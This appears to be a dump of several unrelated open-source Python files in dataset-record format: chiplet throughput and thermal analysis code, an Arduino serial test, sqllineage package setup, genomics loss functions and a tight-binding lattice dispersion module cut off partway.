ici_graph\n\t(paths_per_class, n_paths_per_edge_per_class) = ici_routing\n\tici_throughputs = {}\n\t# Iterate through traffic classes\n\tfor traffic in [\"C2C\",\"C2M\",\"C2I\",\"M2I\"]:\n\t\tici_throughputs[traffic] = {}\n\t\t# Compute the maximum theoretically possible throughput\n\t\tsending_units = sum([chiplets[x[\"name\"]][\"unit_count\"] for x in placement[\"chiplets\"] if (chiplets[x[\"name\"]][\"type\"][0].upper() == traffic[0])])\n\t\t# Compute throughputs of all paths in this class\n\t\tpath_throughputs = []\n\t\tfor (src,dst) in paths_per_class[traffic]:\n\t\t\tpath = paths_per_class[traffic][(src,dst)]\n\t\t\tpath_throughputs.append(1.0 / max([n_paths_per_edge_per_class[traffic][(path[i], path[i+1])] for i in range(len(path)-1)]))\n\t\t# Use the most congested path as proxy to estimate congestion\n\t\tn_paths = len(path_throughputs)\n\t\tpath_throughputs_sorted = sorted(path_throughputs)\n\t\ttp = min((n_paths * path_throughputs_sorted[0]) / sending_units, 1.0)\n\t\t# Compute and store statistics\n\t\tici_throughputs[traffic][\"fraction_of_theoretical_peak\"] = tp\n\t\tici_throughputs[traffic][\"all_per_path_throughputs\"] = path_throughputs\n\t# Return results\n\treturn ici_throughputs\n\t\t\n# Perform the thermal analysis\ndef compute_thermal_analysis(chiplets, placement, packaging, thermal_config, area_summary):\t\n\t# Compute grid-size\n\tresolution\t= thermal_config[\"resolution\"]\n\trows = int(math.ceil(area_summary[\"chip_height\"] / resolution))\n\tcols = int(math.ceil(area_summary[\"chip_width\"] / resolution))\n\t(cell_width, cell_height) = (area_summary[\"chip_width\"] / cols, area_summary[\"chip_height\"] / rows)\n\t# For each grid-cell, compute the temperature increase due to incoming energy from chiplets / irouters\n\ttemperature_in = [[0 for i in range(cols)] for j in range(rows)]\n\tk_c = thermal_config[\"k_c\"]\n\tk_i = thermal_config[\"k_i\"]\n\t# Compute incoming power due to chiplets\t\n\tfor chiplet_desc in placement[\"chiplets\"]:\n\t\tchiplet = chiplets[chiplet_desc[\"name\"]]\n\t\t(x,y) = (chiplet_desc[\"position\"][\"x\"],chiplet_desc[\"position\"][\"y\"])\n\t\t(w,h) = (chiplet[\"dimensions\"][\"x\"],chiplet[\"dimensions\"][\"y\"])\n\t\tchiplet_pwr = chiplet[\"power\"]\n\t\tpwr_per_mm2 = chiplet_pwr / (w *h)\n\t\ttemp_per_mm2 = pwr_per_mm2 * k_c\n\t\trow = int(math.floor(y / cell_height))\n\t\twhile row <= (((y + h) / cell_height) - 1) and row < rows:\n\t\t\tcol = int(math.floor(x / cell_width))\n\t\t\twhile col <= (((x + w) / cell_width) - 1) and col < cols:\n\t\t\t\ttemperature_in[row][col] += temp_per_mm2\n\t\t\t\tcol += 1\n\t\t\trow +=1 \n\t# Compute incoming power due to interposer_routers\n\t# TODO: For now, we simply add the energy to a single cell. For high resolutions, this can produce hotspots.\n\tirouter_pwr = (packaging[\"power_irouter\"] if \"power_irouter\" in packaging else 0)\n\tfor irouter in placement[\"interposer_routers\"]:\n\t\t(x,y) = (irouter[\"position\"][\"x\"],irouter[\"position\"][\"y\"])\n\t\trow = int(math.floor(y / cell_height))\n\t\tcol = int(math.floor(x / cell_width))\n\t\ttemperature_in[row][col] += (irouter_pwr * k_i)\n\t# Perform simulation\n\tamb = thermal_config[\"ambient_temperature\"]\n\tk_t = thermal_config[\"k_t\"]\n\tk_s = thermal_config[\"k_s\"]\n\tk_hs = thermal_config[\"k_hs\"]\n\ttemperature = [[amb for i in range(cols)] for j in range(rows)]\n\titer_count = 0\n\tdiff = float(\"inf\")\n\twhile iter_count < thermal_config[\"iteration_limit\"] and diff > thermal_config[\"threshold\"]:\n\t\titer_count += 1\n\t\ttemperature_new = copy.deepcopy(temperature)\t\n\t\t# Update all grid cells\n\t\tfor row in range(rows):\n\t\t\tfor col in range(cols):\n\t\t\t\t# Apply incoming energy form chiplets / irouters \n\t\t\t\ttemperature_new[row][col] += temperature_in[row][col]\n\t\t\t\t# Apply horizontal heat transfer\n\t\t\t\tfrom_left = 0 if col == 0 else (temperature[row][col-1] - temperature[row][col])\n\t\t\t\tfrom_right = 0 if col == (cols - 1) else (temperature[row][col+1] - temperature[row][col])\n\t\t\t\tfrom_bottom = 0 if row == 0 else (temperature[row-1][col] - temperature[row][col])\n\t\t\t\tfrom_top = 0 if row == (rows - 1) else (temperature[row+1][col] - temperature[row][col])\n\t\t\t\ttemperature_new[row][col] += k_t * (from_left + from_right + from_bottom + from_top)\n\t\t\t\t# Apply outgoing energy through heat sink \n\t\t\t\ttemperature_new[row][col] -= (k_hs * abs(temperature[row][col] - amb))\n\t\t# Apply heat dissipated through the side of the chip\n\t\tfor row in range(rows):\t\n\t\t\ttemperature_new[row][0] -= (k_s * abs(temperature[row][0] - amb))\n\t\t\ttemperature_new[row][cols-1] -= (k_s * abs(temperature[row][cols-1] - amb))\n\t\tfor col in range(cols):\t\n\t\t\ttemperature_new[0][col] -= (k_s * abs(temperature[0][col] - amb))\n\t\t\ttemperature_new[rows-1][col] -= (k_s * abs(temperature[rows-1][col] - amb))\n\t\t# Compute the total change in temperature \n\t\tdiff_sum = sum([abs(temperature[row][col] - temperature_new[row][col]) for row in range(rows) for col in range(cols)])\n\t\tdiff = diff_sum / (rows * cols)\n\t\t# Update grid\n\t\ttemperature = temperature_new\n\ttemperature_flat = [x for inner in temperature for x in inner]\n\tthermal_analysis = {\n\t\t\"avg\" : sum(temperature_flat) / len(temperature_flat),\n\t\t\"min\" : min(temperature_flat),\n\t\t\"max\" : max(temperature_flat),\n\t\t\"grid\" : temperature,\n\t\t\"iterations_simulated\" : iter_count\n\t}\n\treturn thermal_analysis \n\t\t\n# Compute the selected metrics\ndef compute_metrics(design, results_file, compute_area, compute_power, compute_link, compute_cost, compute_latency, compute_throughput, compute_thermal, routing):\n\t# Results\n\tresults = {}\n\t# Timing\n\ttiming = {}\n\tstart_time_overall = time.time()\t\n\tstart_time = time.time()\t\n\t# Update flags for metrics that are internally used for other metrics\n\tcompute_ici_graph = compute_latency or compute_throughput\n\tcompute_area = compute_area or compute_cost or compute_thermal\n\tcompute_link = compute_link or compute_latency\n\t# Technology node\n\ttechnology = None\n\tif compute_cost or compute_latency:\t\n\t\ttechnology = hlp.read_file(filename = design[\"technology_nodes_file\"])\n\t# Chiplets \n\tchiplets = None\n\tif compute_area or compute_power or compute_link or compute_cost or compute_ici_graph or compute_latency or compute_throughput or compute_thermal:\t\n\t\tchiplets = hlp.read_file(filename = design[\"chiplets_file\"])\n\t# Placement\n\tplacement = None\n\tif compute_area or compute_power or compute_link or compute_cost or compute_ici_graph or compute_latency or compute_throughput or compute_thermal:\t\n\t\tplacement = hlp.read_file(filename = design[\"chiplet_placement_file\"])\n\t# Topology\n\ttopology = None\n\tif compute_link or compute_ici_graph:\t\n\t\ttopology = hlp.read_file(filename = design[\"ici_topology_file\"])\n\t# Packaging\n\tpackaging = None\n\tif compute_power or compute_link or compute_cost or compute_latency or compute_thermal:\t\n\t\tpackaging = hlp.read_file(filename = design[\"packaging_file\"])\n\t# Temperature Config \n\tthermal_config = None\n\tif compute_thermal:\n\t\tthermal_config = hlp.read_file(filename = design[\"thermal_config\"])\n\t# Update timing stats\n\ttiming[\"reading_inputs\"] = time.time() - start_time\n\tstart_time = time.time()\n\t# Validate design\n\tif not vld.validate_design(design, technology, chiplets, placement, topology, packaging, thermal_config):\n\t\tprint(\"warning: This design contains validation errors - the RapidChiplet toolchain might fail.\")\n\t# Update timing stats\n\ttiming[\"validating\"] = time.time() - start_time\n\tstart_time = time.time()\n\t# Only construct the ICI graph if we need it (i.e. if latency or throughput are computed)\n\tif compute_ici_graph:\n\t\tici_graph = construct_ici_graph(chiplets, placement, topology)\n\t\tif not vld.validate_ici_graph(ici_graph):\n\t\t\tprint(\"warning: The ICI topology contains validation errors - the RapidChiplet toolchain might fail.\")\n\t\tici_routing = construct_ici_routing(ici_graph, routing)\n\t# Update timing stats\n\ttiming[\"processing_inputs\"] = time.time() - start_time\n\tstart_time = time.time()\n\t# Compute the area summary\n\tif compute_area:\n\t\tarea_summary = compute_area_summary(chiplets, placement)\n\t\tresults[\"area_summary\"] = area_summary \n\t\t# Update timing stats\n\t\ttiming[\"computing_area_summary\"] = time.time() - start_time\n\t\tstart_time = time.time()\n\t# Compute the power summary\n\tif compute_power:\n\t\tpower_summary = compute_power_summary(chiplets, placement, packaging)\n\t\tresults[\"power_summary\"] = power_summary \n\t\t# Update timing stats\n\t\ttiming[\"computing_power_summary\"] = time.time() - start_time\n\t\tstart_time = time.time()\n\t# Compute the link summary\n\tlink_lengths_internal = None\n\tif compute_link:\n\t\t(link_summary, link_lengths_internal) = compute_link_summary(chiplets, placement, topology, packaging)\n\t\tresults[\"link_summary\"] = link_summary \n\t\t# Update timing stats\n\t\ttiming[\"computing_link_summary\"] = time.time() - start_time\n\t\tstart_time = time.time()\n\t# Compute the manufacturing cost\n\tif compute_cost:\n\t\tmanufacturing_cost = compute_manufacturing_cost(technology, chiplets, placement, packaging, area_summary)\n\t\tresults[\"manufacturing_cost\"] = manufacturing_cost \n\t\t# Update timing stats\n\t\ttiming[\"computing_manufacturing_cost\"] = time.time() - start_time\n\t\tstart_time = time.time()\n\t# Compute ICI latency\n\tif compute_latency:\n\t\tici_latency = compute_ici_latency(technology, chiplets, placement, packaging, ici_graph, ici_routing, link_lengths_internal)\n\t\tresults[\"ici_latency\"] = ici_latency \n\t\t# Update timing stats\n\t\ttiming[\"computing_ici_latency\"] = time.time() - start_time\n\t\tstart_time = time.time()\n\t# Compute ICI throughput\n\tif compute_throughput:\n\t\tici_throughput = compute_ici_throughput(chiplets, placement, ici_graph, ici_routing)\n\t\tresults[\"ici_throughput\"] = ici_throughput\n\t\t# Update timing stats\n\t\ttiming[\"computing_ici_throughput\"] = time.time() - start_time\n\t\tstart_time = time.time()\n\t# Thermal analysis\n\tif compute_thermal:\n\t\tthermal_analysis = compute_thermal_analysis(chiplets, placement, packaging, thermal_config, area_summary)\n\t\tresults[\"thermal_analysis\"] = thermal_analysis \n\t\t# Update timing stats\n\t\ttiming[\"thermal_analysis\"] = time.time() - start_time\n\t\tstart_time = time.time()\n\t# Update timing stats\n\ttiming[\"total_runtime\"] = time.time() - start_time_overall\n\t# Add timing to results\n\tresults[\"runtime\"] = timing\n\t# Store results\n\thlp.write_file(\"./results/%s.json\" % results_file, results)\n\nif __name__ == \"__main__\":\n\t# Read command line arguments\n\tparser = argparse.ArgumentParser()\t\n\tparser.add_argument(\"-df\", \"--design_file\", required = True, help = \"Path to the \\\"design\\\" input file\") \n\tparser.add_argument(\"-rf\", \"--results_file\", required = True, help = \"Name of the results file (is stored in ./results/)\")\n\tparser.add_argument(\"-r\", \"--routing\", required = False, help = \"Use the non-default \\\"balanced\\\" or \\\"random\\\" routing\")\n\tparser.add_argument(\"-as\", \"--area_summary\", action=\"store_true\", help = \"Compute the area summary\")\n\tparser.add_argument(\"-ps\", \"--power_summary\", action=\"store_true\", help = \"Compute the power summary\")\n\tparser.add_argument(\"-ls\", \"--link_summary\", action=\"store_true\", help = \"Compute the link summary\")\n\tparser.add_argument(\"-c\", \"--cost\", action=\"store_true\", help = \"Compute the manufacturing cost\")\n\tparser.add_argument(\"-T\", \"--thermal\", action=\"store_true\", help = \"Compute the thermal analysis\")\n\tparser.add_argument(\"-l\", \"--latency\", action=\"store_true\", help = \"Compute the ICI latency\")\n\tparser.add_argument(\"-t\", \"--throughput\", action=\"store_true\", help = \"Compute the ICI throughput\")\n\targs = parser.parse_args()\n\t# Read the design file\n\tdesign = hlp.read_file(filename = args.design_file)\n\t# Compute metrics\n\tcompute_metrics(design = design, \n\t\t\t\t\tresults_file = args.results_file, \n\t\t\t\t\tcompute_area = args.area_summary,\n\t\t\t\t\tcompute_power = args.power_summary,\n\t\t\t\t\tcompute_link = args.link_summary,\n\t\t\t\t\tcompute_cost = args.cost, \n\t\t\t\t\tcompute_latency = args.latency,\n\t\t\t\t\tcompute_throughput = args.throughput,\n\t\t\t\t\tcompute_thermal = args.thermal,\n\t\t\t\t\trouting = args.routing)\n\n","repo_name":"spcl/rapidchiplet","sub_path":"rapid_chiplet.py","file_name":"rapid_chiplet.py","file_ext":"py","file_size_in_byte":24389,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"2834322523","text":"from time import sleep\nimport serial\nimport numpy as np\n#is this better in another file?\nser = serial.Serial(port='/dev/cu.usbmodem1411', baudrate=9600, bytesize=8, timeout=10000)\n\n#counter = 32 # Below 32 everything in ASCII is gibberish\ngenomes = 10\ngenes = 8\nbigdaddy = np.random.rand(genomes,genes,genes)\nbigmommy = np.around(bigdaddy)\nprint(bigmommy)\n#convert array into string?\n#if 10000000=1\n#if 10100000=4\n\n\n#convert the list of 8 bits into a byte\n#testlist = [[1, 1, 1, 1, 1, 1, 1, 1],[1, 1, 1, 1, 1, 1, 1, 0]]\n#print(testlist)\n\nbytelist=[]\n\n\ntempbits= 0\nfor j in range(len(bigmommy[0])):\n tempbits = 0\n for i in range(len(bigmommy[0][j])):\n if bigmommy[0][j][i] == 1:\n tempbits += 2**(7-i)\n print(tempbits)\n bytelist.append(tempbits)\n\nprint(bytelist)\n#testbyte = bytes(testlist)\n#print(testbyte)\n\n#print(testarray2)\nwhile False:\n #counter +=1\n #ser.write(str(chr(counter))) # Convert the decimal number to ASCII then send it to the Arduino\n ser.write(bytelist)\n print (ser.readline()) # Read the newest output from the Arduino\n sleep(.8) # Delay for one tenth of a second\n #if counter == 255:\n #counter = 32","repo_name":"RenaldoDaVinci/SwitchNE","sub_path":"Switch/Arduino/Arduino_test.py","file_name":"Arduino_test.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14657754907","text":"import logging.config\nimport os\n\n\ndef _monkey_patch() -> None:\n try:\n from sqlparse.engine import grouping\n from sqllineage.utils.sqlparse import group_function_with_window\n\n grouping.group_functions = group_function_with_window\n except ImportError:\n # when imported by setup.py for constant variables, dependency is not ready yet\n pass\n\n\n_monkey_patch()\n\nNAME = \"sqllineage\"\nVERSION = \"1.3.1\"\nDEFAULT_LOGGING = {\n \"version\": 1,\n \"disable_existing_loggers\": False,\n \"formatters\": {\"default\": {\"format\": \"%(levelname)s: %(message)s\"}},\n \"handlers\": {\n \"console\": {\n \"level\": \"WARNING\",\n \"class\": \"logging.StreamHandler\",\n \"formatter\": \"default\",\n }\n },\n \"loggers\": {\n \"\": {\n \"handlers\": [\"console\"],\n \"level\": \"WARNING\",\n \"propagate\": False,\n \"filters\": [],\n },\n \"werkzeug\": {\n \"handlers\": [\"console\"],\n \"level\": \"ERROR\",\n \"propagate\": False,\n \"filters\": [],\n },\n },\n}\nlogging.config.dictConfig(DEFAULT_LOGGING)\n\nSTATIC_FOLDER = \"build\"\nDATA_FOLDER = os.environ.get(\n \"SQLLINEAGE_DIRECTORY\", os.path.join(os.path.dirname(__file__), \"data\")\n)\nDEFAULT_HOST = \"localhost\"\nDEFAULT_PORT = 5000\n","repo_name":"shalevy1/sqllineage","sub_path":"sqllineage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"15109432806","text":"\"\"\"Loss functions\n\"\"\"\nimport tensorflow as tf\nimport keras.losses as kloss\nfrom concise.utils.helper import get_from_module\nimport keras.backend as K\nimport gin\nfrom gin import config\n\n\n@gin.configurable\ndef multinomial_nll(true_counts, logits):\n \"\"\"Compute the multinomial negative log-likelihood along the sequence (axis=1)\n and sum the values across all each channels\n\n Args:\n true_counts: observed count values (batch, seqlen, channels)\n logits: predicted logit values (batch, seqlen, channels)\n \"\"\"\n # swap axes such that the final axis will be the positional axis\n logits_perm = tf.transpose(logits, (0, 2, 1))\n true_counts_perm = tf.transpose(true_counts, (0, 2, 1))\n\n counts_per_example = tf.reduce_sum(true_counts_perm, axis=-1)\n\n dist = tf.contrib.distributions.Multinomial(total_count=counts_per_example,\n logits=logits_perm)\n\n # Normalize by batch size. One could also normalize by\n # sequence length here.\n batch_size = tf.to_float(tf.shape(true_counts)[0])\n\n return -tf.reduce_sum(dist.log_prob(true_counts_perm)) / batch_size\n\n\n@gin.configurable\nclass CountsMultinomialNLL:\n\n def __init__(self, c_task_weight=1):\n self.c_task_weight = c_task_weight\n\n def __call__(self, true_counts, preds):\n probs = preds / K.sum(preds, axis=-2, keepdims=True)\n logits = K.log(probs / (1 - probs))\n\n # multinomial loss\n multinomial_loss = multinomial_nll(true_counts, logits)\n\n mse_loss = kloss.mse(K.log(1 + K.sum(true_counts, axis=(-2, -1))),\n K.log(1 + K.sum(preds, axis=(-2, -1))))\n\n return multinomial_loss + self.c_task_weight * mse_loss\n\n def get_config(self):\n return {\"c_task_weight\": self.c_task_weight}\n\n\n@gin.configurable\nclass PoissonMultinomialNLL:\n\n def __init__(self, c_task_weight=1):\n self.c_task_weight = c_task_weight\n\n def __call__(self, true_counts, preds):\n probs = preds / K.sum(preds, axis=-2, keepdims=True)\n logits = K.log(probs / (1 - probs))\n\n # multinomial loss\n multinomial_loss = multinomial_nll(true_counts, logits)\n\n poisson_loss = kloss.poisson(K.sum(true_counts, axis=(-2, -1)),\n K.sum(preds, axis=(-2, -1)))\n\n return multinomial_loss + self.c_task_weight * poisson_loss\n\n def get_config(self):\n return {\"c_task_weight\": self.c_task_weight}\n\n\nAVAILABLE = [\"multinomial_nll\",\n \"CountsMultinomialNLL\",\n \"PoissonMultinomialNLL\"]\n\n\ndef get(name):\n try:\n return kloss.get(name)\n except ValueError:\n return get_from_module(name, globals())\n","repo_name":"kundajelab/bpnet","sub_path":"bpnet/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"54"} +{"seq_id":"28417634896","text":"import numpy as np\nimport time\nimport Lattice\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d\nimport sys \n\n\n#Hack for now, search for: choose dispersion wherever we want to change dispersion\nclass Dispersion_TB_single_band:\n\n def __init__(self, hop, fill,size_E,Machine=None):\n\n self.hop=hop\n if Machine is None:\n self.Machine = \"\"\n else:\n self.Machine = Machine \n \n\n #GRIDS AND INTEGRATION MEASURES\n print(\"started calculating filling for chemical potential and dispersion parameters TB_single_band..\")\n\n self.Npoi_ints=1000 # 1200 for accurate calculation, 400 for quick\n self.latt_int=Lattice.TriangLattice(self.Npoi_ints, False, Machine) #temp grid for integrating and getting filling\n \n # [KX,KY]=self.latt_int.Generate_lattice()\n [self.KX,self.KY]=self.latt_int.read_lattice()\n Vol_rec=self.latt_int.Vol_BZ()\n self.ds=Vol_rec/np.size(self.KX)\n self.ds2=1/np.size(self.KX)\n\n self.energy_k = self.Disp(self.KX,self.KY)\n \n \n Wbdw=np.max(self.energy_k)-np.min(self.energy_k)\n\n #DISPERSION PARAMS\n self.bandmin=np.min(self.energy_k)\n self.bandmax=np.max(self.energy_k)\n self.bandwidth=Wbdw\n\n #getting chempot for filling\n [self.nn,self.earr,Dos]=self.DOS(size_E)\n self.Dos=Dos/Vol_rec\n indemin=np.argmin((self.nn-fill)**2)\n mu=self.earr[indemin]\n # mu=24\n self.mu=mu\n self.name=\"lattice_disp\"\n\n\n #validating actual filling\n self.EF= self.mu-self.bandmin #fermi energy from the bottom of the band\n self.energy_k_mu = self.Disp_mu(self.KX,self.KY)\n nu_fill=np.sum(np.heaviside(-self.energy_k_mu,1)*self.ds)/Vol_rec\n print(\"finished calculating filling for chemical potential\")\n print(\"Filling: {f} .... chemical potential: {m}\".format(f=nu_fill,m=mu))\n \n self.filling=nu_fill\n self.target_fill=fill\n \n [self.dens2,self.bins,self.valt,self.f2 ]=self.DOS_2()\n\n \n def Disp(self,kx,ky):\n [tp1,tp2]=self.hop\n ed=-tp1*(2*np.cos(kx)+4*np.cos((kx)/2)*np.cos(np.sqrt(3)*(ky)/2))\n ed=ed-tp2*(2*np.cos(np.sqrt(3)*(ky))+4*np.cos(3*(kx)/2)*np.cos(np.sqrt(3)*(ky)/2))\n return ed\n\n def Disp_mu(self,kx,ky):\n\n [tp1,tp2]=self.hop\n ed=-tp1*(2*np.cos(kx)+4*np.cos((kx)/2)*np.cos(np.sqrt(3)*(ky)/2))\n ed=ed-tp2*(2*np.cos(np.sqrt(3)*(ky))+4*np.cos(3*(kx)/2)*np.cos(np.sqrt(3)*(ky)/2))\n return ed-self.mu\n\n\n def Fermi_Vel(self,kx,ky):\n\n [tp1,tp2]=self.hop\n sq3y2=np.sqrt(3)*ky/2\n sq3y=np.sqrt(3)*ky\n vx=-tp1*(-2*np.cos(sq3y2)*np.sin(kx/2)-2*np.sin(kx)) +6*tp2*np.cos(sq3y2)*np.sin(3*kx/2)\n vy=2*np.sqrt(3)*tp1*np.cos(kx/2)*np.sin(sq3y2)-2*np.sqrt(3)*tp2*(-np.cos(3*kx/2)*np.sin(sq3y2)-np.sin(sq3y))\n return [vx,vy]\n \n\n\n #if used in the middle of plotting will close the plot\n def FS_contour(self, Np):\n s=time.time()\n print('starting contour.....')\n y = np.linspace(-4,4, 4603)\n x = np.linspace(-4.1,4.1, 4603)\n X, Y = np.meshgrid(x, y)\n Z = self.Disp(X,Y) #choose dispersion\n c= plt.contour(X, Y, Z, levels=[self.mu],linewidths=3, cmap='summer');\n plt.close()\n #plt.show()\n numcont=np.shape(c.collections[0].get_paths())[0]\n \n if numcont==1:\n v = c.collections[0].get_paths()[0].vertices\n else:\n contourchoose=0\n v = c.collections[0].get_paths()[0].vertices\n sizecontour_prev=np.prod(np.shape(v))\n for ind in range(1,numcont):\n v = c.collections[0].get_paths()[ind].vertices\n sizecontour=np.prod(np.shape(v))\n if sizecontour>sizecontour_prev:\n contourchoose=ind\n v = c.collections[0].get_paths()[contourchoose].vertices\n NFSpoints=Np\n xFS_dense = v[::int(np.size(v[:,1])/NFSpoints),0]\n yFS_dense = v[::int(np.size(v[:,1])/NFSpoints),1]\n e=time.time()\n print('finished contour.....', e-s)\n return [xFS_dense,yFS_dense]\n \n def FS_contour_HT(self, Np):\n s=time.time()\n print('starting high res contour.....')\n sizegrid=int(Np/3)\n y = np.linspace(-3,3, sizegrid) #3 is able to capture half filling FS\n x = np.linspace(-3,3, sizegrid) #3 is able to capture half filling FS\n X, Y = np.meshgrid(x, y)\n Z = self.Disp(X,Y) #choose dispersion\n c= plt.contour(X, Y, Z, levels=[self.mu],linewidths=3, cmap='summer');\n plt.close()\n #plt.show()\n numcont=np.shape(c.collections[0].get_paths())[0]\n print('number of sheets.....',numcont)\n if numcont==1:\n v = c.collections[0].get_paths()[0].vertices\n else:\n contourchoose=0\n v = c.collections[0].get_paths()[0].vertices\n sizecontour_prev=np.prod(np.shape(v))\n for ind in range(1,numcont):\n v = c.collections[0].get_paths()[ind].vertices\n sizecontour=np.prod(np.shape(v))\n if sizecontour>sizecontour_prev:\n contourchoose=ind\n v = c.collections[0].get_paths()[contourchoose].vertices\n NFSpoints=Np\n print('contour size and intended span.....',np.size(v[:,1]),NFSpoints,int(np.size(v[:,1])/NFSpoints))\n xFS_dense = v[:,0]\n yFS_dense = v[:,1]\n e=time.time()\n print('finished high res contour.....', e-s)\n return [xFS_dense,yFS_dense]\n \n def FS_contour_HT2(self,Nangles):\n s=time.time()\n print('starting high res contour.....')\n Np=(2**9+1)*40\n print(\"attempting countour of size\",Np)\n sizegrid=int(Np)\n y = np.linspace(-3,3, sizegrid) #3 is able to capture half filling FS\n x = np.linspace(-3,3, sizegrid) #3 is able to capture half filling FS\n X, Y = np.meshgrid(x, y)\n Z = self.Disp(X,Y) #choose dispersion\n c= plt.contour(X, Y, Z, levels=[self.mu],linewidths=3, cmap='summer');\n plt.close()\n #plt.show()\n numcont=np.shape(c.collections[0].get_paths())[0]\n print('number of sheets.....',numcont)\n if numcont==1:\n v = c.collections[0].get_paths()[0].vertices\n else:\n contourchoose=0\n v = c.collections[0].get_paths()[0].vertices\n sizecontour_prev=np.prod(np.shape(v))\n for ind in range(1,numcont):\n v = c.collections[0].get_paths()[ind].vertices\n sizecontour=np.prod(np.shape(v))\n if sizecontour>sizecontour_prev:\n contourchoose=ind\n v = c.collections[0].get_paths()[contourchoose].vertices\n\n print('contour size before interpolation.....',np.size(v[:,1]))\n xFS_dense = v[:,0]\n yFS_dense = v[:,1]\n e=time.time()\n print('finished high res contour.....', e-s)\n \n \n angdens=np.arctan2(yFS_dense,xFS_dense)\n #sorting the arrays traversing them from -pi to pi\n list_ang, listx = zip(*sorted(zip(list(angdens), list(xFS_dense) )))\n list_ang, listy = zip(*sorted(zip(list(angdens), list(yFS_dense) )))\n angdens=np.array(list_ang)\n xFS_dense=np.array(listx)\n yFS_dense=np.array(listy)\n \n \n fx = interp1d(angdens, xFS_dense)\n fy = interp1d(angdens, yFS_dense)\n ang=np.linspace(np.min(angdens), np.max(angdens),Nangles)\n print(\"range of angles from marching squares\",np.min(angdens), np.max(angdens))\n \n return [fx(ang),fy(ang)]\n \n def deltad(self,x, epsil):\n return (1/(np.pi*epsil))/(1+(x/epsil)**2)\n\n def DOS(self,size_E):\n\n #DOMAIN OF THE DOS\n minE=self.bandmin-0.001*self.bandwidth\n maxE=self.bandmax+0.001*self.bandwidth\n earr=np.linspace(minE,maxE,size_E)\n\n \n Vol_rec=self.latt_int.Vol_BZ()\n\n\n \n #parameter for delta func approximation\n epsil=0.02*self.bandwidth\n\n ##DOS \n Dos=[]\n for i in earr:\n dosi=np.sum(self.deltad(self.energy_k-i,epsil))*self.ds\n Dos.append(dosi)\n \n de=earr[1]-earr[0]\n Dos=np.array(Dos)\n print(\"norm of Dos,\", np.sum(Dos)*de, self.latt_int.VolBZ)\n \n #FILLING FOR EACH CHEMICAL POTENTIAL\n ndens=[]\n for mu_ind in range(size_E):\n \n N=np.trapz(Dos[0:mu_ind])*de\n ndens.append(N)\n nn=np.array(ndens)\n nn=nn/nn[-1]\n \n print(\"sum of the hist, normed?\", np.sum(Dos)*de)\n\n return [nn,earr,Dos]\n \n def DOS_2(self):\n Ene_BZ=self.energy_k\n \n eps_l=[]\n \n eps_l.append(np.mean( np.abs( np.diff( Ene_BZ.flatten() ) ) )/2)\n eps_a=np.array(eps_l)\n eps=np.min(eps_a)*30\n \n mmin=np.min(Ene_BZ)\n mmax=np.max(Ene_BZ)\n NN=int((mmax-mmin)/eps)+int((int((mmax-mmin)/eps)+1)%2) #making sure there is a bin at zero energy\n binn=np.linspace(mmin,mmax,NN+1)\n valt=np.zeros(NN)\n\n val_p,bins_p=np.histogram(Ene_BZ.flatten(), bins=binn,density=True)\n valt=valt+val_p\n\n \n bins=(binn[:-1]+binn[1:])/2\n \n #taking into account spin\n valt=valt*2\n \n f2 = interp1d(binn[:-1],valt, kind='cubic',bounds_error=False, fill_value=0)\n de=(bins[1]-bins[0])\n print(\"sum of the hist, normed?\", np.sum(valt)*de)\n \n \n \n #FILLING FOR EACH CHEMICAL POTENTIAL\n ndens=[]\n for mu_ind in range(NN):\n N=np.trapz(valt[0:mu_ind])*de\n ndens.append(N)\n nn=np.array(ndens)\n dens2=nn/nn[-1]\n \n \n\n return [dens2,bins,valt,f2 ]\n\n #######random functions\n def nf(self, e, T):\n rat=np.max(np.abs(e/T))\n if rat<700:\n return 1/(1+np.exp( e/T ))\n else:\n return np.heaviside(-e,0.5)\n\n def nb(self, e, T):\n rat=np.max(np.abs(e/T))\n if rat<700:\n return 1/(np.exp( e/T )-1)\n else:\n return -np.heaviside(-e,0.5)\n \n def be_nf(self, e, T):\n rat=np.max(np.abs(e/T))\n if rat<700:\n x=e/T\n return x/(np.exp(x)+1)\n else:\n return np.heaviside(-e,0.5)\n\n def be_nb(self, e, T):\n rat=np.max(np.abs(e/T))\n if rat<700:\n x=e/T\n expr=x/(np.exp(x)-1)\n problems=np.where(np.isnan(expr))[0]\n expr[problems]=1\n return expr\n else:\n return -(e/T)*np.heaviside(-e,0.5)\n \n def PlotFS(self, lat):\n l=Lattice.TriangLattice(100,False )\n Npoi=1000\n Vertices_list, Gamma, K, Kp, M, Mp=l.FBZ_points(l.b[0,:],l.b[1,:])\n VV=np.array(Vertices_list+[Vertices_list[0]])\n [KxFS,KyFS]=self.FS_contour(Npoi)\n plt.plot(VV[:,0], VV[:,1],c='k')\n plt.scatter(KxFS, KyFS, s=1, c='r')\n plt.show()\n\n\nclass Dispersion_circ:\n\n def __init__(self, hop, fill, Machine=None):\n\n self.hop=hop\n \n if Machine is None:\n self.Machine = \"\"\n else:\n self.Machine = Machine \n\n #GRIDS AND INTEGRATION MEASURES\n print(\"started calculating filling for chemical potential and dispersion parameters _circ.. \")\n\n self.Npoi_ints=1200\n self.latt_int=Lattice.TriangLattice(self.Npoi_ints, True,Machine) #temp grid for integrating and getting filling\n \n # [KX,KY]=l.Generate_lattice()\n [KX,KY]=self.latt_int.read_lattice()\n Vol_rec=self.latt_int.Vol_BZ()\n ds=Vol_rec/np.size(KX)\n\n energy_k = self.Disp(KX,KY)\n \n \n Wbdw=np.max(energy_k)-np.min(energy_k)\n\n #DISPERSION PARAMS\n self.bandmin=np.min(energy_k)\n self.bandmax=np.max(energy_k)\n self.bandwidth=Wbdw\n\n #getting chempot for filling\n [nn,earr,Dos]=self.DOS(size_E=500, Npoi_ints=1200)\n indemin=np.argmin((nn-fill)**2)\n mu=earr[indemin]\n self.mu=mu\n self.name=\"parabolic_disp\"\n\n\n #validating actual filling\n self.EF= self.mu-self.bandmin #fermi energy from the bottom of the band\n energy_k_mu = self.Disp_mu(KX,KY)\n 